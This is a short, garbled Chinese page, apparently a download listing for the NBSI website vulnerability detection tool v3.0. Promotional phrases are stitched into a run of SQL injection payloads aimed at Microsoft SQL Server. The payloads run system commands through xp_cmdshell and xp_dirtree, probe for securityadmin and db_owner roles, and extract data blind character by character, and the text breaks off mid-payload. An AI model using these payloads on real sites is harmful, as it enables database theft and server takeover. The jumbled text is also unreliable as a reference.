nbsi网站漏洞检测工具v3.0 官方版

;insert dirs exec master.dbo.xp_dirtree 'c:\'nbsi网站漏洞检测工具 v3.0 官方版，10.测试权限结构（mssql）;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--;exec master.dbo.xp_cmdshell 'net user username6.猜数据库nbsi 3.0纯净版下载，;and 1=(SELECT IS_MEMBER('db_owner'));--;and (select top 1 unicode(substring(字段名，1，1)) from 数据库名)>0;--;and (select top 1 asc(mid(字段名，1，1)) from 数据库名)>0;and user> ...